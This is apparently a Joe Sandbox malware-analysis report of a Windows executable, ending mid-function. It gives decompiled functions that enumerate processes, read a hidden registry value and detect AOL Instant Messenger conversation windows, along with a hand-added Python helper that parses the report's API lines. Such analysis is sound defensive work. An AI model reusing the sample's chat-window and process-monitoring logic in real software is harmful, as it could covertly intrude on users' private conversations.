    • Opcode ID: 156f6d9e4f06cb9c9ea0b5ea5351ea398ba7e02b0546579aa7696673fc3c0121
    • Instruction ID: fd43742f172e9bb6331bedefd9d3c01534a2785723ea9a414f22a38e49391883
    • Opcode Fuzzy Hash: 156f6d9e4f06cb9c9ea0b5ea5351ea398ba7e02b0546579aa7696673fc3c0121
    • Instruction Fuzzy Hash: C0219EB1901686DFDB14DBA9C1013DDFBB9AF95308F14419F949677282CBB82B08C766
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • OpenProcess.KERNEL32(00000410,00000000,?,?,__oxFrame.class__,?,?,0042899F,?,?), ref: 00428B7E
    • EnumProcessModules.PSAPI(00000000,?,00000004,?,?,?,0042899F,?,?), ref: 00428B95
    • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,?,?,0042899F,?,?), ref: 00428BAB
    • CloseHandle.KERNEL32(00000000,?,?,0042899F,?,?), ref: 00428BBD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Process$CloseEnumFileHandleModuleModulesNameOpen
    • String ID: __oxFrame.class__
    • API String ID: 2971614962-3739978297
    • Opcode ID: b0029013f571fbc4080f54593d3533104bb06897c50c328326e4055854776487
    • Instruction ID: 7199bb29a34be87a96e7f4a403d50851ffc36b5799ec56518d247b7d088911db
    • Opcode Fuzzy Hash: b0029013f571fbc4080f54593d3533104bb06897c50c328326e4055854776487
    • Instruction Fuzzy Hash: 7501A276700214BBDB125B51EC09FAF3F68AB81B52F00406DFA05D9290DBB4D6409768
    Uniqueness

    Uniqueness Score: -1.00%
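Added example (my own, not part of the Joe Sandbox report and not code from the analysed sample): a small Python triage helper that parses lines in the format the "APIs" sections above use, decodes the constants that actually appear in them (the OpenProcess access mask 0x410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, the registry hive 0x80000001 = HKEY_CURRENT_USER, nSize 0x104 = MAX_PATH) and buckets the call sites by capability. The capability buckets and the sample lines embedded in the block are my own construction from the listing; the line grammar is inferred from the lines on this page and may not cover every form Joe Sandbox emits.

```python
"""Triage helper for the "APIs" lines of a Joe Sandbox function listing.

Added example for this page; it is not Joe Sandbox code and not code from the
analysed sample.  SAMPLE_LINES are copied from the listings on this page; the
constant tables hold only Windows SDK values that those lines actually use.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]   # hex immediate, string literal, or '?' (unrecovered)

# Constructed from the listings on this page (bullets removed).
SAMPLE_LINES = [
    "OpenProcess.KERNEL32(00000410,00000000,?,?,__oxFrame.class__,?,?,0042899F,?,?), ref: 00428B7E",
    "EnumProcessModules.PSAPI(00000000,?,00000004,?,?,?,0042899F,?,?), ref: 00428B95",
    "GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,?,?,0042899F,?,?), ref: 00428BAB",
    "CloseHandle.KERNEL32(00000000,?,?,0042899F,?,?), ref: 00428BBD",
    "RegCreateKeyA.ADVAPI32(80000001,Software\\Microsoft\\Internet Explorer,?), ref: 0041B008",
    "RegQueryValueExA.ADVAPI32(?,IEPK,00000000,00000000,?,00000008), ref: 0041B024",
    "FindWindowExA.USER32 ref: 00409761",
    "Part of subcall function 0041B133: time.MSVCRT ref: 0041B141",
]

_SUBCALL_PREFIX = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")
_LINE_RE = re.compile(
    r"^(?P<api>[#\w]+)\.(?P<module>\w+)"          # OpenProcess.KERNEL32 / #2414.MFC42
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$"
)
_HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Windows SDK constants for the arguments seen on this page.
PROCESS_ACCESS = [(0x0010, "PROCESS_VM_READ"), (0x0400, "PROCESS_QUERY_INFORMATION")]
REG_HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Coarse capability buckets; an assumption made for this example, not a Joe Sandbox category.
CAPABILITIES = {
    "process-enumeration": {"OpenProcess", "EnumProcessModules", "GetModuleFileNameExA"},
    "registry-access": {"RegCreateKeyA", "RegQueryValueExA", "RegCloseKey"},
    "window-inspection": {"FindWindowExA", "IsWindow", "SendMessageA", "SetForegroundWindow"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                       # address of the call site inside the sample


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None                # the decompiler could not recover this argument
    if _HEX_RE.match(token):
        return int(token, 16)      # also handles negatives such as -000000C5
    return token                   # string literal, e.g. a registry path


def parse_api_line(line: str) -> ApiCall:
    text = _SUBCALL_PREFIX.sub("", line.strip().lstrip("\u2022 ").strip())
    m = _LINE_RE.match(text)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess mask; unknown bits are kept as hex."""
    names = [name for bit, name in PROCESS_ACCESS if mask & bit]
    rest = mask & ~sum(bit for bit, _ in PROCESS_ACCESS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def capability(call: ApiCall) -> Optional[str]:
    return next((cap for cap, apis in CAPABILITIES.items() if call.api in apis), None)


def explain(call: ApiCall) -> str:
    """One-line reading of a call with the arguments we know how to decode."""
    note = ""
    if call.api == "OpenProcess" and call.args and isinstance(call.args[0], int):
        note = " access=" + "|".join(decode_process_access(call.args[0]))
    elif call.api.startswith("Reg") and call.args and isinstance(call.args[0], int):
        hive = REG_HIVES.get(call.args[0])
        if hive:
            note = f" hive={hive} path={call.args[1]}"
    elif call.api == "GetModuleFileNameExA" and len(call.args) > 3:
        note = f" nSize={call.args[3]}"   # 0x104 == MAX_PATH
    return f"{call.ref:08X} {call.api} ({call.module}){note}"


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Group call sites by capability; APIs outside the tables land under 'other'."""
    out: Dict[str, List[str]] = {}
    for line in lines:
        call = parse_api_line(line)
        out.setdefault(capability(call) or "other", []).append(explain(call))
    return out


if __name__ == "__main__":
    for cap, calls in triage(SAMPLE_LINES).items():
        print(cap)
        for c in calls:
            print("   ", c)
```

Run it directly to print the grouped call sites. The OpenProcess / EnumProcessModules / GetModuleFileNameExA / CloseHandle sequence at 00428B7E..00428BBD, opened with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (the access EnumProcessModules requires) and read into a MAX_PATH buffer, is the pattern behind a process-enumeration finding; extending the constant tables is the natural next step when a report shows other masks.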

    C-Code - Quality: 75%
    			// Runs only while the global flag at 0x455ae0 is clear: it builds a temporary
    			// (E0041BFC6 / E0041C073), fills a CString via MFC #860 from this+0x1dcc and, if
    			// that string is non-empty (MFC 4.2 keeps the length at buffer-8), calls
    			// SetForegroundWindow on the window handle at this+0x20 (CWnd::m_hWnd).
    			E00425403(void* __ecx) {
    				intOrPtr _t17;
    				int _t18;
    				signed int _t20;
    				void* _t34;
    				intOrPtr _t39;
    
    				E0043E4E0(0x44297b, _t34);
    				_t39 =  *0x455ae0; // 0x0
    				if(_t39 == 0) {
    					_push(0);
    					E0041BFC6(_t34 - 0x18c);
    					_push(__ecx + 0x1dcc);
    					 *(_t34 - 4) = 0;
    					L0043DDD2();
    					_t17 =  *((intOrPtr*)(_t34 - 0xbc));
    					__eflags =  *(_t17 - 8);
    					if( *(_t17 - 8) != 0) {
    						_t18 = SetForegroundWindow( *(__ecx + 0x20));
    						_push(1);
    						_pop(0);
    						 *0x455ae0 = 0;
    						L0043DE7A();
    						__eflags = _t18;
    						 *0x455ae0 = 0;
    						if(_t18 != 0) {
    							__eflags = 0;
    						}
    					} else {
    						_push(1);
    						_pop(0);
    					}
    					_t9 = _t34 - 4;
    					 *_t9 =  *(_t34 - 4) | 0xffffffff;
    					__eflags =  *_t9;
    					E0041C073(_t34 - 0x18c,  *_t9);
    					_t20 = 0;
    				} else {
    					_t20 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
    				return _t20;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x00425408
    0x00425419
    0x0042541f
    0x00425425
    0x0042542c
    0x0042543d
    0x0042543e
    0x00425441
    0x00425446
    0x0042544c
    0x0042544f
    0x00425459
    0x0042545f
    0x00425467
    0x00425468
    0x0042546e
    0x00425473
    0x00425475
    0x0042547b
    0x0042547d
    0x0042547d
    0x00425451
    0x00425451
    0x00425453
    0x00425453
    0x0042547f
    0x0042547f
    0x0042547f
    0x00425489
    0x0042548e
    0x00425421
    0x00425421
    0x00425421
    0x00425495
    0x0042549d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #860H_prolog
    • String ID: {)D
    • API String ID: 2044854137-2450670785
    • Opcode ID: f2097b52c474d4f247b9546b8a1be85509677d34c0c3895d08f335ec67cacb27
    • Instruction ID: ce43c62490061b3583002702631966e2f5f4cbb70bc9c7782def522eb782dea8
    • Opcode Fuzzy Hash: f2097b52c474d4f247b9546b8a1be85509677d34c0c3895d08f335ec67cacb27
    • Instruction Fuzzy Hash: 9601D631A00A24EBCB21EB29EC417E9F7B4FB58751F5082AFE00693190DB745E81CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			// Constructor matching the destructor E00418A07 above: after MFC #324 (resource ID
    			// 0x97) it constructs the members at +0x60, +0x174, +0x1c8, +0x21c and +0x330,
    			// installs the vtables and creates a light-grey solid brush (COLORREF 0xEFEFEF)
    			// that is handed to MFC #1641, the usual pattern for a dialog background brush.
    			E0041892F(intOrPtr* __ecx, void* __eflags) {
    				void* __esi;
    				void* _t24;
    				void* _t25;
    				intOrPtr* _t44;
    				void* _t46;
    
    				_t49 = __eflags;
    				E0043E4E0(0x440f2f, _t46);
    				_push(__ecx);
    				_push( *((intOrPtr*)(_t46 + 8)));
    				_t44 = __ecx;
    				 *((intOrPtr*)(_t46 - 0x10)) = __ecx;
    				_push(0x97);
    				L0043E054();
    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
    				_t24 = E0040CE10(__ecx + 0x60, __eflags);
    				 *(_t46 - 4) = 1;
    				_t25 = L00404F04(_t24, __ecx + 0x174, __ecx);
    				 *(_t46 - 4) = 2;
    				L00404F04(_t25, _t44 + 0x1c8, _t44);
    				 *(_t46 - 4) = 3;
    				E0040CE10(_t44 + 0x21c, _t49);
    				 *(_t46 - 4) = 4;
    				E0040CE10(_t44 + 0x330, _t49);
    				 *(_t44 + 0x448) =  *(_t44 + 0x448) & 0x00000000;
    				 *((intOrPtr*)(_t44 + 0x444)) = 0x44615c;
    				 *(_t44 + 0x450) =  *(_t44 + 0x450) & 0x00000000;
    				 *((intOrPtr*)(_t44 + 0x44c)) = 0x446a18;
    				 *(_t46 - 4) = 7;
    				 *_t44 = 0x447860;
    				_push(CreateSolidBrush(0xefefef));
    				L0043DD60();
    				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
    				return _t44;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x0041892f
    0x00418934
    0x00418939
    0x0041893c
    0x0041893f
    0x00418941
    0x00418944
    0x00418949
    0x0041894e
    0x00418955
    0x00418960
    0x00418964
    0x0041896f
    0x00418973
    0x0041897e
    0x00418982
    0x0041898d
    0x00418991
    0x00418996
    0x004189a3
    0x004189a9
    0x004189b6
    0x004189c1
    0x004189c5
    0x004189d1
    0x004189d4
    0x004189e0
    0x004189e8

    APIs
    • __EH_prolog.LIBCMT ref: 00418934
    • #324.MFC42(00000097,?), ref: 00418949
      • Part of subcall function 0040CE10: __EH_prolog.LIBCMT ref: 0040CE15
    • CreateSolidBrush.GDI32(00EFEFEF), ref: 004189CB
    • #1641.MFC42(00000000), ref: 004189D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: H_prolog$#1641#324BrushCreateSolid
    • String ID: C
    • API String ID: 766757258-2515487769
    • Opcode ID: b47630ff79c846175a8828a1059a76b92aa6eb59e309244597c3d4277e57a7c2
    • Instruction ID: 26ab5b58aa3bc6cf34b7af67da662e0d78b704631159f64622e9114ca185f942
    • Opcode Fuzzy Hash: b47630ff79c846175a8828a1059a76b92aa6eb59e309244597c3d4277e57a7c2
    • Instruction Fuzzy Hash: E711A3B5911744DFD325EB61C445BDDFBF4AF95308F00485EE65A63282CBB82608CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			// Plain constructor: the base and member constructors (MFC #567, #540, #556) run
    			// under the provisional vtable 0x446660, the members are zeroed, then the final
    			// vtable 0x446590 is installed and +0x40 is set to 0xFFFFFF (COLORREF white).
    			E0040C655(intOrPtr __ecx) {
    				void* _t29;
    
    				E0043E4E0(0x43fdca, _t29);
    				_push(__ecx);
    				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
    				L0043DF64();
    				 *((intOrPtr*)(__ecx)) = 0x446660;
    				 *((intOrPtr*)(__ecx + 0x44)) = 0x44615c;
    				 *((intOrPtr*)(_t29 - 4)) = 0;
    				 *((intOrPtr*)(__ecx + 0x48)) = 0;
    				 *((char*)(_t29 - 4)) = 1;
    				L0043DDD8();
    				 *((char*)(_t29 - 4)) = 2;
    				L0043E186();
    				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
    				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
    				 *((intOrPtr*)(__ecx + 0xb0)) = 0;
    				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
    				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
    				 *((intOrPtr*)(__ecx)) = 0x446590;
    				 *((intOrPtr*)(__ecx + 0x40)) = 0xffffff;
    				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
    				return __ecx;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x0040c65a
    0x0040c65f
    0x0040c664
    0x0040c667
    0x0040c66c
    0x0040c674
    0x0040c67b
    0x0040c67e
    0x0040c684
    0x0040c688
    0x0040c690
    0x0040c694
    0x0040c69c
    0x0040c69f
    0x0040c6a5
    0x0040c6ab
    0x0040c6b1
    0x0040c6b7
    0x0040c6bd
    0x0040c6c8
    0x0040c6d0

    APIs
    • __EH_prolog.LIBCMT ref: 0040C65A
    • #567.MFC42(?,?,?,0040CE26,?,?,00403F1E), ref: 0040C667
    • #540.MFC42(?,?,?,?,?,?,?,?,?,?,?,0040CE26,?,?,00403F1E), ref: 0040C688
    • #556.MFC42(?,?,?,?,?,?,?,?,?,?,?,0040CE26,?,?,00403F1E), ref: 0040C694
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540#556#567H_prolog
    • String ID: \aD
    • API String ID: 344723303-2544947625
    • Opcode ID: 66f36a6bee566ff3a0a9933a2c0c3db2cc84fac04c353f19513d2bb60b19af02
    • Instruction ID: d0a53709eae4b21cf61fcb14e8fad21a042e3201f4444e74f7444a0a0ffee9f2
    • Opcode Fuzzy Hash: 66f36a6bee566ff3a0a9933a2c0c3db2cc84fac04c353f19513d2bb60b19af02
    • Instruction Fuzzy Hash: A40128B0801B54DBD720DF6AC50168AFBF8BF95704F00895FD09683791D7F86508CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Reads the 8-byte value "IEPK" under HKEY_CURRENT_USER (0x80000001)
    			// \Software\Microsoft\Internet Explorer.  _v24 is the receive buffer (cbData = 8),
    			// so _v20 aliases its upper DWORD; E0041B133 (memset + time, see APIs) pre-fills it.
    			// If the value is missing the result defaults to 5; a negative result is clamped to 0.
    			// RegCreateKeyA rather than RegOpenKeyExA is used, so the key is created when absent.
    			E0041AFE1() {
    				void* _v8;
    				int _v12;
    				int _v16;
    				signed int _v20;
    				char _v24;
    
    				E0041B133( &_v24);
    				_v16 = _v16 & 0x00000000;
    				_v12 = 8;
    				RegCreateKeyA(0x80000001, "Software\\Microsoft\\Internet Explorer",  &_v8);
    				if(RegQueryValueExA(_v8, "IEPK", 0,  &_v16,  &_v24,  &_v12) != 0) {
    					_v20 = 5;
    				}
    				if(_v20 < 0) {
    					_v20 = _v20 & 0x00000000;
    				}
    				RegCloseKey(_v8);
    				return _v20;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x0041afea
    0x0041afef
    0x0041b001
    0x0041b008
    0x0041b02c
    0x0041b02e
    0x0041b02e
    0x0041b039
    0x0041b03b
    0x0041b03b
    0x0041b042
    0x0041b04c

    APIs
      • Part of subcall function 0041B133: memset.MSVCRT ref: 0041B13B
      • Part of subcall function 0041B133: time.MSVCRT ref: 0041B141
    • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B008
    • RegQueryValueExA.ADVAPI32(?,IEPK,00000000,00000000,?,00000008), ref: 0041B024
    • RegCloseKey.ADVAPI32(?), ref: 0041B042
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CloseCreateQueryValuememsettime
    • String ID: IEPK$Software\Microsoft\Internet Explorer
    • API String ID: 2817275356-794077097
    • Opcode ID: 09d3c769bb5c674ec0ca2f19f50405c970d267488d14dae936480e6a984f255a
    • Instruction ID: 7a72d8f0bfb7c9a28e279d93d18db44e113eb126667b4210c368abc09a41bbc7
    • Opcode Fuzzy Hash: 09d3c769bb5c674ec0ca2f19f50405c970d267488d14dae936480e6a984f255a
    • Instruction Fuzzy Hash: F1F0EC7590020DEFEB10DFD0DD49BEEB7B8FB04309F10006AA511B11A0DBB56B59DBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Returns non-zero only when the window's class name starts with "AIM_IMessage"
    			// (an AOL Instant Messenger message window; 0xc is the length of that literal)
    			// and the window owns at least two "WndAte32Class" children.  The
    			// '& 0xffffff00 | _t10 != 0' tail is the decompiler's rendering of a SETNE on
    			// the second FindWindowExA result; _t10 is an undeclared decompiler temporary.
    			E0040972A(struct HWND__* _a4, char* _a8) {
    				struct HWND__* _t7;
    				struct HWND__* _t9;
    				CHAR* _t12;
    
    				if(_a4 != 0) {
    					_t7 = strncmp(_a8, "AIM_IMessage", 0xc);
    					if(_t7 != 0) {
    						goto L1;
    					}
    					_t12 = "WndAte32Class";
    					_t9 = FindWindowExA(_a4, _t7, _t12, _t7);
    					if(_t9 == 0) {
    						goto L1;
    					}
    					return FindWindowExA(_a4, _t9, _t12, 0) & 0xffffff00 | _t10 != 0x00000000;
    				}
    				L1:
    				return 0;
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x00409731
    0x00409742
    0x0040974d
    0x00000000
    0x00000000
    0x00409755
    0x00409761
    0x00409765
    0x00000000
    0x00000000
    0x00000000
    0x00409773
    0x00409733
    0x00000000

    APIs
    • strncmp.MSVCRT(?,AIM_IMessage,0000000C), ref: 00409742
    • FindWindowExA.USER32 ref: 00409761
    • FindWindowExA.USER32 ref: 0040976F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: AIM_IMessage$WndAte32Class
    • API String ID: 3975895692-2861659317
    • Opcode ID: bcb9bc4b83236d8f3166df2de34aa11bb6ad6806583d9a3a43f3b793b4c6ed9d
    • Instruction ID: c4442d600dddee87d0dd06869ef743fef577152b9be3bc3b4ce3ba8e991b27d9
    • Opcode Fuzzy Hash: bcb9bc4b83236d8f3166df2de34aa11bb6ad6806583d9a3a43f3b793b4c6ed9d
    • Instruction Fuzzy Hash: 8EF06531605211F6E6205F219C05F277FACDFD1791F118436BC40A31E7E2399D5A95B9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			// Builds the returned CString from a window's text (E0040FEA7 reads it with
    			// WM_GETTEXTLENGTH (0xE) / WM_GETTEXT (0xD), see the subcall list) and the literal
    			// " - Conversation"; the exact concatenation is hidden behind MFC42 ordinals
    			// #2764 / #4129, which the decompiler does not resolve.
    			E00409A56(void* __ecx) {
    				void* _t18;
